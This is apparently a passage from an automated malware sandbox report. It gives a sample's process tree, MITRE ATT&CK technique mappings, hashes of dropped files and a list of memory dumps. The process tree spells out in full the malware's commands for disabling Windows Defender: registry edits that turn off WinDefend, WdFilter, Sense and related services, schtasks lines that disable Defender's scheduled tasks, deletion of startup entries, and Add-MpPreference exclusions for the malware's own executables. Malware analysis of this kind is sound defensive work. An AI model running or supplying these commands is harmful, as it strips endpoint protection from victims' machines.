        
        "cmd.exe" /c reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4648
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2808
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3452
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1324
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1508
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1576
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4516
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3784
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3704
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4948
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4928
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4332
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1192
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:940
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4476
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4904
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1452
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
        8⤵
        
        PID:1692
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3108
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4720
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4644
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4876
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
        7⤵
        
        PID:4696
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3324
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3660
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
        8⤵
        Modifies Security services
        System Location Discovery: System Language Discovery
        
        PID:1884
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1568
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
        8⤵
        Modifies Security services
        System Location Discovery: System Language Discovery
        
        PID:440
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
        7⤵
        
        PID:3172
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
        8⤵
        Modifies Security services
        
        PID:712
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2172
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
        8⤵
        Modifies Security services
        System Location Discovery: System Language Discovery
        
        PID:1048
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3996
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
        8⤵
        Modifies security service
        System Location Discovery: System Language Discovery
        
        PID:4212
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
        7⤵
        
        PID:248
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
        8⤵
        Modifies Security services
        System Location Discovery: System Language Discovery
        
        PID:3036
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c reg add "HKLM\System\CurrentControlSet\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1704
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f
        8⤵
        
        PID:4196
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3316
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:484
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Local\Temp\rh111.exe'"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3124
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Local\Temp\rh111.exe'"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3416
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dAWb2d3ve7XMXW0Z.exe'"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4024
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dAWb2d3ve7XMXW0Z.exe'"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4600
- C:\Users\Admin\AppData\Local\Temp\90d841da88320cac9daa43c1af2de6e5e1156cb44727c2fc1121e33ce6c7543b.exe
  "C:\Users\Admin\AppData\Local\Temp\90d841da88320cac9daa43c1af2de6e5e1156cb44727c2fc1121e33ce6c7543b.exe"
  2⤵
  - Checks SCSI registry key(s)
  PID:3824

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENT.vector

Filesize
32B

MD5
a351f7287d52daee97e45b77ef3bef0b

SHA1
b256dba4446a93256395b298a3ceed52b0828a82

SHA256
f6d2328ceb2900ca0ce9a9e1e3bfb2bf98473e6755277ea73b533c3200ad40e8

SHA512
61b6942f8c60350bad737a97890c7729eeae3300455b2aaa9ac77b4a2b81656ad4f8509ab7f2777207edc29cf29f8f507638d7317a18db8e30b3c94cff8f5ac5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001.vector

Filesize
48B

MD5
457f485e6e619d63527657c5232d22e7

SHA1
7f7c6198b70412de369af87761fb78cef4393786

SHA256
b447ab7a39428059b1aef281639238de4ae184c2b54cfd1fb017bdbb8eeac0a8

SHA512
94c73aebfeb7ee0d85c035c48bfe4d379a0dc77199c83d1f82cec5ee3d371114a72c4607fadb2b2f19fe447b5e6fb4de52e568f55dd15bf633d86510647f25ed

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Shared Dictionary\cache\index.vector

Filesize
32B

MD5
73c1c6664e84a7231bc77aeee486122e

SHA1
ad0d49a14f48bdbfcb4957b77dd6b5e135586dd7

SHA256
f9bdefc0fca47a171a1378fbbf6b988d055ff0521d380f5ccdd73769429fb91e

SHA512
9426b286744e65ded8ad42aee5264c893261e773928c160620513c4ff04afccc550fb140a56aa11f223b0d480557667dd5ea6f2f377a5fe5385b7021fb3b1409

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_0.vector

Filesize
8KB

MD5
a3244ee7d15cc12c6366d9751a4d63fe

SHA1
38335cfe4da42d6dc5f57230ba2969a94401a1cb

SHA256
48a6e136e2f0e6c378376ce38ab346c3e79cb85925933e26d70872576e0ee09d

SHA512
880590df93d991ddd5ba8d982b2b06f0bb29321978619cffafeb8cdfd9360e8d823120c6176a872b11bafaafc62e188dd672094aa5d37e471f74a8ea1f00347d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1.vector

Filesize
264KB

MD5
3c781dd84bcb6e5cf1f480ef1619bf99

SHA1
75734207efcc8720d13c68c4be3c858518be01df

SHA256
e5e57409f696451eed4c856e828cba09c3520eb50275ed1edb09b26f3987fb9f

SHA512
556cd69ae8ca676b22a91db3d5feaf6bd501640d095c7bbdacdbd4770a3cd20fa208d51655223bf8f95c6d21d684de76a8393963341c29de03090f597ccc8b94

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_2.vector

Filesize
8KB

MD5
7febbc9e908e0de8b0775ee081099bce

SHA1
01257696d0fe720e1cbb3abf7b7d55fe1c6f9b2b

SHA256
ca6cd4bb50da60753ffa28b703ccb2b43509d4b58d4faa33594a843e01f55f4d

SHA512
5015123245b4bd63e063fd31b219169093b315d48cb8ee75f6cdb0071c6d9d918b925f41c740c0970d28c7d002355b0aa2e0ef65016619a35f04bf6772cadb87

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_3.vector

Filesize
8KB

MD5
65f6407acce3f0c11a92f541ffdd155e

SHA1
6124139e7c1af8b42214a672fc8e9127473844e2

SHA256
f883731813b71ac1fc1efa3512efc459fe78e28f091e480b064f071e6354d276

SHA512
08292c5a55a3ffc20c541ce6e0840fa6648d5316c399001006d633a64b3abf3285ec90b6169bec8f62fb0dcebf03f95478380e006e33869629a9062bbbae4b17

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
e080d58e6387c9fd87434a502e1a902e

SHA1
ae76ce6a2a39d79226c343cfe4745d48c7c1a91a

SHA256
6fc482e46f6843f31d770708aa936de4cc32fec8141154f325438994380ff425

SHA512
6c112200ef09e724f2b8ab7689a629a09d74db2dcb4dd83157dd048cbe74a7ce5d139188257efc79a137ffebde0e3b61e0e147df789508675fedfd11fcad9ede

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\First Run.vector

Filesize
16B

MD5
b7a402ab68924757e78c2d7a274ac1d1

SHA1
2ddc737760fc571a96a4128f036e88973b1a6d73

SHA256
c45afdb95a8220470f4bbfca14fe23d453b7a5038693258afc1b41c3b921c40d

SHA512
f4376ff92cd97c44b0dc224e324f177b683ecc2e44c00ec6c852ad0c132b949374c1558c5bdd5031ab0f393dd107232817a41e33d3672aa463272b05b0685c77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Indexed DB\edbtmp.log.vector

Filesize
512KB

MD5
63f3b8d98421493ef31fbb3915b7b2bd

SHA1
cd9170936219b6b3a3deb433a801ab812fddfeb0

SHA256
9280aaa68ad7b44a23122f42db1571d20dd4069b8cb98e39b5c880737ef07395

SHA512
c66f43fd3bb1a4db154c6592398859a9bbd6d05d04920727c3215e26d93e8f3374f1a3bcb1ebdc984c80fb942f6718b8861167793114bb6b423c06c523a6ad94

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
7c38248ead77ca92c79b4b5554c15833

SHA1
85e612f3d7ee34ca92c9326e4430d3dfd0e5bcbc

SHA256
4e6b1e98063b55a66742e95e03d19673f8b0e362ad8a19eb1ef1bec08eaf2ce3

SHA512
96d073bcaf779c1818252f194a15fd92c9e8bec905d513569c712f318020016b3600109eb8a26da0d57156343216fa56e1a7b206e614e13a6c787d8b844331cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
2ab3a10807b6ab21bf2aeafcf9819c41

SHA1
c2a1c855e9c958c36169e5463053a9932f119b27

SHA256
1932e6f995c57148a414461e019eb1a14d82fda297fffb60e14d010e8530119f

SHA512
51971fa11382a69a93063ce2f50f6b53262b78091a8e1a76d43c00be2638d6e5825a0f84d180959797bdb79fdd5d64179748df6ea7b72ca06cc7f329ecdc1e5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1nnoklbx.lp5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\jsUWddJYBLu3.bat

Filesize
171B

MD5
e68f93b48bdc220877177c82c54bf7c3

SHA1
3fda730013977cdef9553fde2a404563536950b1

SHA256
1c7fcab045170106e656e483cfbb9a26c5102c176a1b50cc3ba5a0aab2e58178

SHA512
c5c1436302fe736cde0b88740c7ec5a5532d438831a5a7f258d526d9453457c97807b4e624b840e0ad7543c840a970c92e9919df6fb3cd8fab0e3a75e08dfa7d

Download Submit
C:\Users\Admin\AppData\Local\Temp\km111.exe

Filesize
1.4MB

MD5
5d047c85071d16b5884a694cd1b9e339

SHA1
004ceeff566381efde2cab50ccb003a2d127b18c

SHA256
76e4e1e740d7e7317b9b66258b00723d0ef766301ccb164d09826178418c80ac

SHA512
1ad94386559b29d858f8712532ce270262ef353fc577f429bce1fd69411a6867da5323b55a77322478367a3b4907cab0299556842ca3f35cf9c547eb564630e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\rh111.exe

Filesize
3.9MB

MD5
9118cba745ce4f9e04aad81ecfbc31ac

SHA1
5681743b883295b9e03dbd7a0392520459a4017c

SHA256
1df3ec5415a542fcfc6bbfa88f3015da3466ce6da8f09cf8d4c77cc093ec5ac3

SHA512
cf2a5edcbb5533bb3d5df1b9a62f50e979d16ac56ba11557f4f79c023728f88688269f248681fda3411dfc196115e5adbae83e66c0b347b7f5465ac45e41365b

Download Submit
C:\Users\Admin\AppData\Local\Temp\wctCFE2.tmp.vector

Filesize
63KB

MD5
ba033f9c45841940a9ebe1c3643c2c69

SHA1
9525b940c505e034eb66b0cad8814e4c9d68a2eb

SHA256
938d8a2b617db3eea925177b79b9408934c22ec34f4aa6a8ab06abb9a79d1f3f

SHA512
38b0393a9a2cd536392b95b832c2dea4890503dba94b4b6ced1089973bd480df42e20a67237444bccc677067de6eec5e11b6d63c9dc47f3f63d293b811c7daf0

Download Submit
memory/1088-3318-0x0000000000400000-0x0000000000768000-memory.dmp

Filesize
3.4MB

Download
memory/1088-3319-0x0000000005710000-0x00000000057AC000-memory.dmp

Filesize
624KB

Download
memory/1088-3377-0x0000000006ED0000-0x0000000006EDA000-memory.dmp

Filesize
40KB

Download
memory/1412-2195-0x00000000749AE000-0x00000000749AF000-memory.dmp

Filesize
4KB

Download
memory/1412-2198-0x0000000005330000-0x0000000005396000-memory.dmp

Filesize
408KB

Download
memory/1412-2196-0x00000000051F0000-0x00000000052AC000-memory.dmp

Filesize
752KB

Download
memory/1412-2220-0x00000000749AE000-0x00000000749AF000-memory.dmp

Filesize
4KB

Download
memory/1412-2224-0x00000000066E0000-0x00000000067C8000-memory.dmp

Filesize
928KB

Download
memory/1412-2225-0x0000000006970000-0x0000000006A5C000-memory.dmp

Filesize
944KB

Download
memory/1412-2194-0x0000000000400000-0x000000000045E000-memory.dmp

Filesize
376KB

Download
memory/1412-2226-0x0000000007030000-0x00000000070C2000-memory.dmp

Filesize
584KB

Download
memory/2556-3312-0x0000000006BA0000-0x0000000006EC8000-memory.dmp

Filesize
3.2MB

Download
memory/2556-2235-0x0000000000B30000-0x0000000000F16000-memory.dmp

Filesize
3.9MB

Download
memory/2556-2236-0x0000000005970000-0x0000000005D1C000-memory.dmp

Filesize
3.7MB

Download
memory/2556-2237-0x0000000005F70000-0x000000000631E000-memory.dmp

Filesize
3.7MB

Download
memory/3416-3345-0x0000000006E80000-0x0000000006E8A000-memory.dmp

Filesize
40KB

Download
memory/3416-3331-0x0000000005A60000-0x0000000005AAC000-memory.dmp

Filesize
304KB

Download
memory/3416-3329-0x0000000005660000-0x00000000059B7000-memory.dmp

Filesize
3.3MB

Download
memory/3416-3332-0x00000000069F0000-0x0000000006A24000-memory.dmp

Filesize
208KB

Download
memory/3416-3333-0x000000006F080000-0x000000006F0CC000-memory.dmp

Filesize
304KB

Download
memory/3416-3342-0x00000000069B0000-0x00000000069CE000-memory.dmp

Filesize
120KB

Download
memory/3416-3343-0x0000000006CD0000-0x0000000006D74000-memory.dmp

Filesize
656KB

Download
memory/3416-3344-0x0000000007430000-0x0000000007AAA000-memory.dmp

Filesize
6.5MB

Download
memory/3416-3346-0x0000000007010000-0x0000000007021000-memory.dmp

Filesize
68KB

Download
memory/3416-3347-0x0000000007040000-0x000000000704E000-memory.dmp

Filesize
56KB

Download
memory/3416-3348-0x0000000007050000-0x0000000007065000-memory.dmp

Filesize
84KB

Download
memory/3416-3349-0x0000000007150000-0x000000000716A000-memory.dmp

Filesize
104KB

Download
memory/3416-3350-0x0000000007140000-0x0000000007148000-memory.dmp

Filesize
32KB

Download
memory/3616-1100-0x00000000749A0000-0x0000000075151000-memory.dmp

Filesize
7.7MB

Download
memory/3616-2188-0x0000000002B93000-0x0000000002B94000-memory.dmp

Filesize
4KB

Download
memory/3616-1098-0x0000000004E50000-0x0000000004F7A000-memory.dmp

Filesize
1.2MB

Download
memory/3616-1095-0x00000000749A0000-0x0000000075151000-memory.dmp

Filesize
7.7MB

Download
memory/3616-2199-0x00000000749A0000-0x0000000075151000-memory.dmp

Filesize
7.7MB

Download
memory/3616-1096-0x0000000000290000-0x00000000003F2000-memory.dmp

Filesize
1.4MB

Download
memory/3616-2197-0x00000000749A0000-0x0000000075151000-memory.dmp

Filesize
7.7MB

Download
memory/3616-2191-0x00000000029F4000-0x00000000029F5000-memory.dmp

Filesize
4KB

Download
memory/3616-1103-0x00000000050E0000-0x000000000520A000-memory.dmp

Filesize
1.2MB

Download
memory/3616-2184-0x0000000005250000-0x0000000005251000-memory.dmp

Filesize
4KB

Download
memory/3616-2185-0x00000000052E0000-0x0000000005386000-memory.dmp

Filesize
664KB

Download
memory/3616-2189-0x0000000002863000-0x0000000002864000-memory.dmp

Filesize
4KB

Download
memory/3824-1237-0x0000000000400000-0x000000000040B000-memory.dmp

Filesize
44KB

Download
memory/3956-2216-0x0000000006B30000-0x0000000006B4A000-memory.dmp

Filesize
104KB

Download
memory/3956-2214-0x0000000006900000-0x000000000694C000-memory.dmp

Filesize
304KB

Download
memory/3956-2213-0x0000000006650000-0x000000000666E000-memory.dmp

Filesize
120KB

Download
memory/3956-2212-0x0000000006190000-0x00000000064E7000-memory.dmp

Filesize
3.3MB

Download
memory/3956-2203-0x00000000060B0000-0x0000000006116000-memory.dmp

Filesize
408KB

Download
memory/3956-2215-0x0000000007810000-0x00000000078A6000-memory.dmp

Filesize
600KB

Download
memory/3956-2202-0x00000000058A0000-0x00000000058C2000-memory.dmp

Filesize
136KB

Download
memory/3956-2217-0x0000000006B80000-0x0000000006BA2000-memory.dmp

Filesize
136KB

Download
memory/3956-2200-0x00000000051A0000-0x00000000051D6000-memory.dmp

Filesize
216KB

Download
memory/3956-2201-0x0000000005910000-0x0000000005F3A000-memory.dmp

Filesize
6.2MB

Download
memory/4032-8-0x0000000006260000-0x000000000647A000-memory.dmp

Filesize
2.1MB

Download
memory/4032-22-0x0000000006260000-0x000000000647A000-memory.dmp

Filesize
2.1MB

Download
memory/4032-48-0x0000000006260000-0x000000000647A000-memory.dmp

Filesize
2.1MB

Download
memory/4032-0-0x00000000749AE000-0x00000000749AF000-memory.dmp

Filesize
4KB

Download
memory/4032-1093-0x0000000007930000-0x0000000007ED6000-memory.dmp

Filesize
5.6MB

Download
memory/4032-1152-0x00000000749A0000-0x0000000075151000-memory.dmp

Filesize
7.7MB

Download
memory/4032-1225-0x00000000749AE000-0x00000000749AF000-memory.dmp

Filesize
4KB

Download
memory/4032-1323-0x00000000749A0000-0x0000000075151000-memory.dmp

Filesize
7.7MB

Download
memory/4032-1105-0x00000000749A0000-0x0000000075151000-memory.dmp

Filesize
7.7MB

Download
memory/4032-1102-0x00000000749A0000-0x0000000075151000-memory.dmp

Filesize
7.7MB

Download
memory/4032-46-0x0000000006260000-0x000000000647A000-memory.dmp

Filesize
2.1MB

Download
memory/4032-1080-0x0000000006740000-0x00000000068DC000-memory.dmp

Filesize
1.6MB

Download
memory/4032-1081-0x00000000064B0000-0x00000000064FC000-memory.dmp

Filesize
304KB

Download
memory/4032-50-0x0000000006260000-0x000000000647A000-memory.dmp

Filesize
2.1MB

Download
memory/4032-61-0x0000000006260000-0x000000000647A000-memory.dmp

Filesize
2.1MB

Download
memory/4032-1079-0x00000000749A0000-0x0000000075151000-memory.dmp

Filesize
7.7MB

Download
memory/4032-44-0x0000000006260000-0x000000000647A000-memory.dmp

Filesize
2.1MB

Download
memory/4032-16-0x0000000006260000-0x000000000647A000-memory.dmp

Filesize
2.1MB

Download
memory/4032-10-0x0000000006260000-0x000000000647A000-memory.dmp

Filesize
2.1MB

Download
memory/4032-54-0x0000000006260000-0x000000000647A000-memory.dmp

Filesize
2.1MB

Download
memory/4032-56-0x0000000006260000-0x000000000647A000-memory.dmp

Filesize
2.1MB

Download
memory/4032-58-0x0000000006260000-0x000000000647A000-memory.dmp

Filesize
2.1MB

Download
memory/4032-13-0x0000000006260000-0x000000000647A000-memory.dmp

Filesize
2.1MB

Download
memory/4032-62-0x0000000006260000-0x000000000647A000-memory.dmp

Filesize
2.1MB

Download
memory/4032-14-0x0000000006260000-0x000000000647A000-memory.dmp

Filesize
2.1MB

Download
memory/4032-18-0x0000000006260000-0x000000000647A000-memory.dmp

Filesize
2.1MB

Download
memory/4032-20-0x0000000006260000-0x000000000647A000-memory.dmp

Filesize
2.1MB

Download
memory/4032-1094-0x00000000065F0000-0x0000000006644000-memory.dmp

Filesize
336KB

Download
memory/4032-26-0x0000000006260000-0x000000000647A000-memory.dmp

Filesize
2.1MB

Download
memory/4032-40-0x0000000006260000-0x000000000647A000-memory.dmp

Filesize
2.1MB

Download
memory/4032-30-0x0000000006260000-0x000000000647A000-memory.dmp

Filesize
2.1MB

Download
memory/4032-52-0x0000000006260000-0x000000000647A000-memory.dmp

Filesize
2.1MB

Download
memory/4032-32-0x0000000006260000-0x000000000647A000-memory.dmp

Filesize
2.1MB

Download
memory/4032-34-0x0000000006260000-0x000000000647A000-memory.dmp

Filesize
2.1MB

Download
memory/4032-36-0x0000000006260000-0x000000000647A000-memory.dmp

Filesize
2.1MB

Download
memory/4032-38-0x0000000006260000-0x000000000647A000-memory.dmp

Filesize
2.1MB

Download
memory/4032-1-0x0000000000100000-0x0000000000358000-memory.dmp

Filesize
2.3MB

Download
memory/4032-66-0x0000000006260000-0x000000000647A000-memory.dmp

Filesize
2.1MB

Download
memory/4032-2-0x00000000749A0000-0x0000000075151000-memory.dmp

Filesize
7.7MB

Download
memory/4032-3-0x0000000004F10000-0x0000000005130000-memory.dmp

Filesize
2.1MB

Download
memory/4032-4-0x0000000006260000-0x0000000006480000-memory.dmp

Filesize
2.1MB

Download
memory/4032-5-0x0000000006260000-0x000000000647A000-memory.dmp

Filesize
2.1MB

Download
memory/4032-6-0x0000000006260000-0x000000000647A000-memory.dmp

Filesize
2.1MB

Download
memory/4032-68-0x0000000006260000-0x000000000647A000-memory.dmp

Filesize
2.1MB

Download
memory/4032-64-0x0000000006260000-0x000000000647A000-memory.dmp

Filesize
2.1MB

Download
memory/4032-42-0x0000000006260000-0x000000000647A000-memory.dmp

Filesize
2.1MB

Download
memory/4032-28-0x0000000006260000-0x000000000647A000-memory.dmp

Filesize
2.1MB

Download
memory/4032-24-0x0000000006260000-0x000000000647A000-memory.dmp

Filesize
2.1MB

Download
memory/4600-3375-0x0000000007BE0000-0x0000000007BF5000-memory.dmp

Filesize
84KB

Download
memory/4600-3374-0x0000000007BB0000-0x0000000007BC1000-memory.dmp

Filesize
68KB

Download
memory/4600-3373-0x00000000078F0000-0x0000000007994000-memory.dmp

Filesize
656KB

Download
memory/4600-3364-0x000000006F050000-0x000000006F09C000-memory.dmp

Filesize
304KB

Download
memory/4600-3363-0x0000000006750000-0x000000000679C000-memory.dmp

Filesize
304KB

